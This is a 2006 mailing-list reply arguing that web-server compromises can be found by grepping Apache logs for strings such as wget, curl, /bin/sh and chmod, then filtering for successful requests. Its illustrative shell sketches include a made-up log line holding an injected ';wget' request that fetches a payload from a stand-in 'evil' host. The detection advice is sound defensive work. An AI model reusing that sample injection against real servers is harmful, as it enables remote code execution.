Re: we were attacked

On Sat, Apr 08, 2006 at 02:22:07PM +0200, Andrew Miehs wrote:
> > On Sat, Apr 08, 2006 at 02:03:49AM +0300, Juha-Matti Tapio wrote:
> >> Problems like this aren't simple to diagnose on webhosting
> >> environments.
> >
> > actually, they're not that hard - you can find most of them by grepping
> > for half a dozen or so likely strings in the apache access log - "wget",
> > "curl", "snarf", "/bin/sh", "/bin/perl", ";", and as a last resort,
> > "%20" (for encoded space characters which nearly all shell exploits will
> > have in them)
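a minimal sketch of the grepping described above. the log lines and the
LOG filename are made up for illustration -- point the grep at your real
apache access log instead:

```shell
# made-up access.log with one normal request and one shell-exploit
# attempt, purely to show what the grep catches
LOG=${LOG:-access.log}
cat > "$LOG" <<'EOF'
10.0.0.1 - - [08/Apr/2006:01:00:00 +0200] "GET /index.html HTTP/1.1" 200 1234
10.0.0.66 - - [08/Apr/2006:01:00:05 +0200] "GET /cgi-bin/foo.cgi?cmd=;wget%20http://evil/x HTTP/1.1" 200 42
EOF

# search for the likely strings; "%20" is the noisiest, so keep it
# as a last resort in a separate pass
egrep 'wget|curl|snarf|/bin/sh|/bin/perl|;' "$LOG"
```

only the exploit attempt matches; the plain index.html request contains
none of the telltale strings.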
> Actually - it IS that hard!

no, it's not.

any half-way competent sysadmin WILL have the skill and the experience to 
eliminate noise when searching log files.  by definition - if they don't have
the skill/experience then they are NOT even remotely competent.

for example, along with the regexp i posted in my last message you can pipe
the output of that grep into another grep which finds only requests that were
successful (i.e. 2xx response codes):

  egrep 'wget|tftp|curl|snarf|chmod|(%2f|\/)tmp' LOGFILE | \
	egrep '" 2[0-9][0-9] '

note that the second regexp starts with a " character - that matches the
closing quote of the request string, so you match the response code and
not the byte count of the result returned by apache.

that will eliminate almost all of the noise (i.e. script-kiddie requests
for exploitable CGI or PHP scripts that don't exist on your system).

BTW, you can use such noise to your advantage. even if you're
having trouble finding the exact script, you can make a list of IP
addresses/hostnames that are making failed (404) exploit requests and
search for them. that will eliminate all good requests and leave you
with just the exploit attempts. refine the search further and you will
inevitably find the culprit.
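a sketch of that IP-list trick. again, the log lines, filenames, and the
root.exe probe are invented examples; the pattern set is the one from
the pipeline above plus one made-up probe string:

```shell
# made-up access.log: a normal request, a failed (404) exploit probe,
# and a successful exploit request, all for illustration
LOG=${LOG:-access.log}
cat > "$LOG" <<'EOF'
10.0.0.1 - - [08/Apr/2006:01:00:00 +0200] "GET /index.html HTTP/1.1" 200 1234
10.0.0.66 - - [08/Apr/2006:01:00:05 +0200] "GET /scripts/root.exe HTTP/1.1" 404 209
10.0.0.66 - - [08/Apr/2006:01:00:09 +0200] "GET /vuln.php?x=;wget%20http://evil/x HTTP/1.1" 200 42
EOF

# step 1: collect the IPs behind failed (404) exploit-looking requests
egrep 'wget|tftp|curl|snarf|chmod|root\.exe' "$LOG" | egrep '" 404 ' \
    | awk '{print $1}' | sort -u > suspects.txt

# step 2: pull every request those IPs made - the successful (2xx)
# hit among these is usually the script that got exploited
grep -f suspects.txt "$LOG"
```

step 2 drops all the good traffic and leaves just the attacker's
requests, which is exactly the refinement described above.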

this is basic sysadmin 101 stuff. anyone running a server on the net
SHOULD know this stuff. they should certainly be at least willing to
learn it rather than whine "it's too hard".

> If you have 1000 requests per second on a box - and these are dynamic
> requests, NOT just for index.html.....

well, duh.  so there are a lot of requests - big deal.  it's your job
to deal with that situation.

> Although I too am not a friend of this type of diagnosis, it is often
> the fastest and easiest way to work out what is happening...

yes, of course. in fact, working out what is happening is the ONLY way
to fix it. that was my point precisely. and one way of finding out what
is happening is to search the log files for suspicious activity.

> Especially when management is standing behind you - there are many
> 'BETTER' ways, but try and do them all correctly with the shadow of
> your boss over your table...

it's also your job to be able to do these things when they're really
needed - and that especially includes high pressure situations.


craig sanders <cas@taz.net.au>           (part time cyborg)
